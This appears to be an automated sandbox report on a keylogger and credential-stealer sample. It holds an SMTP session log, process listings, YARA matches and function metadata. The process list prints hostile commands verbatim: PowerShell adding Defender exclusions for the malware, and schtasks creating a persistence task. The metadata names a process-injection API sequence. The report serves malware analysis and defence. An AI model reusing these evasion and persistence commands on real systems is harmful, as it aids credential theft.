Oct 1, 2024 10:55:43.886593103 CEST	587	49745	75.102.58.14	192.168.2.5	250-sc-europe110.banahosting.com Hello 065367 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 1, 2024 10:55:43.886831999 CEST	49745	587	192.168.2.5	75.102.58.14	STARTTLS
Oct 1, 2024 10:55:44.060343027 CEST	587	49745	75.102.58.14	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	04:54:55
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Imagebase:	0xbd0000
File size:	769'536 bytes
MD5 hash:	102C9CE1C659517C4EA924C2044305B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Imagebase:	0xfb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"
Imagebase:	0xfb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"
Imagebase:	0xb10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:54:56
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:54:58
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"
Imagebase:	0xae0000
File size:	769'536 bytes
MD5 hash:	102C9CE1C659517C4EA924C2044305B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	04:54:58
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\AcEnrS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\AcEnrS.exe
Imagebase:	0x120000
File size:	769'536 bytes
MD5 hash:	102C9CE1C659517C4EA924C2044305B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:55:00
Start date:	01/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:55:02
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"
Imagebase:	0xb10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:55:03
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:55:03
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\AcEnrS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\AcEnrS.exe"
Imagebase:	0x540000
File size:	769'536 bytes
MD5 hash:	102C9CE1C659517C4EA924C2044305B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:55:18
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7708 -s 1500
Imagebase:	0xfe0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	159
Total number of Limit Nodes:	6

Executed Functions

Function 07738237 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e8c22e7e149350070087a7043ecc8bce8904b48265608d6c7f650a477cb42b
Instruction ID: 59e0c889530291c6109caeddc5841e2a48caca342030ead8060f74b93590ad77
Opcode Fuzzy Hash: 47e8c22e7e149350070087a7043ecc8bce8904b48265608d6c7f650a477cb42b
Instruction Fuzzy Hash: 14A001D08BF112C180055C7068558F4902C120B0D4F443400A16A2350389A68019406B

Function 02ECD030 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02ECD0BE
GetCurrentThread.KERNEL32 ref: 02ECD0FB
GetCurrentProcess.KERNEL32 ref: 02ECD138
GetCurrentThreadId.KERNEL32 ref: 02ECD191

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9e125f5b0a04faf9a198d32bcf61b34d8d8f7b5c34e96de9a66480f6521957e8
Instruction ID: 76f02c4d71bfab89efadfe94fd4ca59b305e84febe51a4da4aaed22627bc6f19
Opcode Fuzzy Hash: 9e125f5b0a04faf9a198d32bcf61b34d8d8f7b5c34e96de9a66480f6521957e8
Instruction Fuzzy Hash: 8E5167B09003498FDB54DFA9DA48BAEBBF1EF48304F24C4ADD509A7360D7399885CB65

Function 02ECD040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02ECD0BE
GetCurrentThread.KERNEL32 ref: 02ECD0FB
GetCurrentProcess.KERNEL32 ref: 02ECD138
GetCurrentThreadId.KERNEL32 ref: 02ECD191

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4662f4a11ea8b55f97fec3e70ef5316e46a1f1ac982e77e23f3b6c1d25ce4522
Instruction ID: 5d682f5c3c6024dbc97812e2da255766383ae0c8b92636ea2e306faf294bdcd5
Opcode Fuzzy Hash: 4662f4a11ea8b55f97fec3e70ef5316e46a1f1ac982e77e23f3b6c1d25ce4522
Instruction Fuzzy Hash: 405155B09003098FDB54DFA9DA48BAEBBF1EF48314F20846DD509A7360D739A884CB65

Function 0773499D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07734BDE

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a25751c2e6d643f5e0830aef4f1849122ec20ca8172bdd2a4a142fd9c8e6310f
Instruction ID: dcf1242a60bf71f3c95850963f8efe872bc3b81b2900a02d75eaabd6dfeb3556
Opcode Fuzzy Hash: a25751c2e6d643f5e0830aef4f1849122ec20ca8172bdd2a4a142fd9c8e6310f
Instruction Fuzzy Hash: 83A18DB1D0035ACFDB28CFA8C840BEDBBB2BF45350F148569E819A7251DB749985CF92

Function 077349A8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07734BDE

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cf6339ecb7ae2d23bc10455b1593444ac264b9aab73e4b467537c2649019206c
Instruction ID: 38aabd9979db572a2ef8096dad740c828e367274b5e82d36739d8d704bca05eb
Opcode Fuzzy Hash: cf6339ecb7ae2d23bc10455b1593444ac264b9aab73e4b467537c2649019206c
Instruction Fuzzy Hash: 4E918CB1D0025ACFDB28CFA8C840BEDBBB2BF48350F148569D819A7251DB749985CF92

Function 02ECADA8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFFE

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 894517dc291da9dc5fa303853179796ba144acea1e24e9a8dd651d5c16fa91f8
Instruction ID: 130bb81b951c5c65f0526e9d68e68f90dbff6dc4279e3bc9437bad24ff7db9ba
Opcode Fuzzy Hash: 894517dc291da9dc5fa303853179796ba144acea1e24e9a8dd651d5c16fa91f8
Instruction Fuzzy Hash: A27146B0A00B098FD724DFA9D54579ABBF5BF48308F10892DE58AD7B50D735E84ACB90

Function 02EC590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02EC59C9

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ccda4bd8042ad14a7c10fb5681b6c0269d528e3b32fef91c167ec4afedcc7204
Instruction ID: ee1b9809ddd624ddc05fb15d9a177ecef500c59e7190d3473733945e33d73d0e
Opcode Fuzzy Hash: ccda4bd8042ad14a7c10fb5681b6c0269d528e3b32fef91c167ec4afedcc7204
Instruction Fuzzy Hash: 414113B0C0061DCBDB24DFAAC984BDEBBB1BF49304F60805AD519BB251DB75694ACF50

Function 02EC44C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02EC59C9

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8a6f738465cbbd0f24f99f0fb3542c7123babdaf92f9a578af4b4745a145ad3f
Instruction ID: c21b86500182e57fcf05028bb45c430469360adaf46779255f96888c1054b29f
Opcode Fuzzy Hash: 8a6f738465cbbd0f24f99f0fb3542c7123babdaf92f9a578af4b4745a145ad3f
Instruction Fuzzy Hash: 304102B0C0061DCBDB24DFAAC944BDEBBB5BF49304F60805AD519BB250DB75694ACF90

Function 07734719 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077347B0

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: caae566fc0ccad734b138a655fb4f81804aba814ed0e7e4e22651963118a001b
Instruction ID: c7e4c986333fd79eb7a451ef262850b4a87f5239d0645e05341f826dd4c86187
Opcode Fuzzy Hash: caae566fc0ccad734b138a655fb4f81804aba814ed0e7e4e22651963118a001b
Instruction Fuzzy Hash: 1B3176B19003499FCB14CFA9C884BEEBFF5FF49310F10842AE958A7241C778A940CBA0

Function 07734808 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07734890

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6c1e514b8c7582996badd0150f8e29d7d23c0d34460f7bfcb1fdffde51ffcb94
Instruction ID: 31bdc0470332577c1e2fe10ff336789f0e9907cc57eb27f3b35967c9b50ba1a1
Opcode Fuzzy Hash: 6c1e514b8c7582996badd0150f8e29d7d23c0d34460f7bfcb1fdffde51ffcb94
Instruction Fuzzy Hash: F7215AB1C103499FCB14DFAAC884AEEBFF5FF49310F10882AE558A7251C779A541CBA4

Function 07734720 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077347B0

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4f0c31c75fd7df1d074c18171b3221cd5a2ca35345f2eb89f3c33cdeacd1ebe3
Instruction ID: ec0d21294b8779ec268e5ec956261cece435d9e9660dbbc02595c9c2d0fdc05a
Opcode Fuzzy Hash: 4f0c31c75fd7df1d074c18171b3221cd5a2ca35345f2eb89f3c33cdeacd1ebe3
Instruction Fuzzy Hash: 092169B59003499FCB10DFA9C884BEEBBF5FF48310F108829E919A7240C778A940CBA0

Function 07734584 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734606

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ca0317ac282448fda331b04d583792f8d8f4107250b9763e4e2654629e089e9c
Instruction ID: 6b5a80477cef6b30820d69cd461417ca16250fa5e17c2b47858d47a879737470
Opcode Fuzzy Hash: ca0317ac282448fda331b04d583792f8d8f4107250b9763e4e2654629e089e9c
Instruction Fuzzy Hash: 1A2159B1D00249CFDB14DFAAC4857EEBFF5EF48314F60842AD519A7241C778A945CBA4

Function 07734588 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734606

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f784a8acc144c568a80b8d049295ba93f2023bcce41b3d1405d2ada8e09adcb1
Instruction ID: d3af5490d21a035d47c77cdeaf83a4600b0bade03569b3260f5d24656c455646
Opcode Fuzzy Hash: f784a8acc144c568a80b8d049295ba93f2023bcce41b3d1405d2ada8e09adcb1
Instruction Fuzzy Hash: F62135B1D002098FDB14DFAAC4857EEBBF4EF48314F50842AD519A7241CB78A984CFA5

Function 07734810 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07734890

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d8670bed791321b8bf80047f85159d30599fd7034c36aa8db5e995f1a82541b8
Instruction ID: 3ac51e329904b715f0d867d8f2f65657df151c9485f6b94d7c10df3dbae23b05
Opcode Fuzzy Hash: d8670bed791321b8bf80047f85159d30599fd7034c36aa8db5e995f1a82541b8
Instruction Fuzzy Hash: 7A2139B1C003499FCB10DFAAC880AEEFBF5FF48310F508829E559A7250C778A540CBA0

Function 02ECD689 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02ECD717

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1306f6ac29c545e6f1e51ecff34c2f2fd0030b844d61d5e6ddf8583391080c3c
Instruction ID: eb340a981568ab65f9a0a834c6440a1316aa87ecda61b46aae8e92d7e6f62fd7
Opcode Fuzzy Hash: 1306f6ac29c545e6f1e51ecff34c2f2fd0030b844d61d5e6ddf8583391080c3c
Instruction Fuzzy Hash: 0A21E3B59002089FDB10CF99D985AEEBBF5FB48314F14842AE918B3310D379A951CFA0

Function 02ECD690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02ECD717

Memory Dump Source

Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: df5adaeef00acf020b9c5b879b664ae113f0ca9a2975a2e180f9e7137a681a55
Instruction ID: 92b190f429551307929a8036374dc75eb7c0a67dd3b4bd1f5347aa391b27fc12
Opcode Fuzzy Hash: df5adaeef00acf020b9c5b879b664ae113f0ca9a2975a2e180f9e7137a681a55
Instruction Fuzzy Hash: 8E21E4B59002489FDB10CF9AD984ADEFBF8FB48310F14842AE918A3310C379A950CFA0

Function 07734659 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077346CE

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0a133bfc7e28f157aa0376c02f336a6b325342deadc39086e6cf4807fafa9da4
Instruction ID: 19d3a9c667d1d2f162ba193bcadf896982b23bd4f8085631cb513c057d71beb7
Opcode Fuzzy Hash: 0a133bfc7e28f157aa0376c02f336a6b325342deadc39086e6cf4807fafa9da4
Instruction Fuzzy Hash: 3B219AB28003889FCB10DFA9C845AEEBFF5EF49314F20881AD559A7251C77AA550CBA0

Function 07734660 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077346CE

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77ff92ba303b434e58b5760d81825c79079d9fc53bdfb1e2c5fb8e349334ab8e
Instruction ID: 58cab331662765614bb1864f54dc0d9217bd6dba22f210616f69ab3da757b20f
Opcode Fuzzy Hash: 77ff92ba303b434e58b5760d81825c79079d9fc53bdfb1e2c5fb8e349334ab8e
Instruction Fuzzy Hash: D21137B58002499FCB10DFAAC844AEEFFF5EF49314F108819E519A7250C779A550CFA0

Function 077344D7 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0773453A

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e1d40b5a57d76f28f997145deae683863ff6d628ce0536abbe14a3811f047b9a
Instruction ID: ff00a4f7f5ba4ef2857ec036aae2c0b7954259ebad8f8ea155614c7f4c6b748a
Opcode Fuzzy Hash: e1d40b5a57d76f28f997145deae683863ff6d628ce0536abbe14a3811f047b9a
Instruction Fuzzy Hash: 6E113AB1D002498FDB24DFAAD4457EEFBF5EF88314F20881AD519A7240CB79A544CFA5

Function 077344D8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0773453A

Memory Dump Source

Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a00620532228741453dbf805e8a187d0cad7c9332b4d6e58138c8de28d811c88
Instruction ID: 1eabb59e09961fd232495a90c791433185ade6e77cae2e81ad86d45b7dd08dad
Opcode Fuzzy Hash: a00620532228741453dbf805e8a187d0cad7c9332b4d6e58138c8de28d811c88
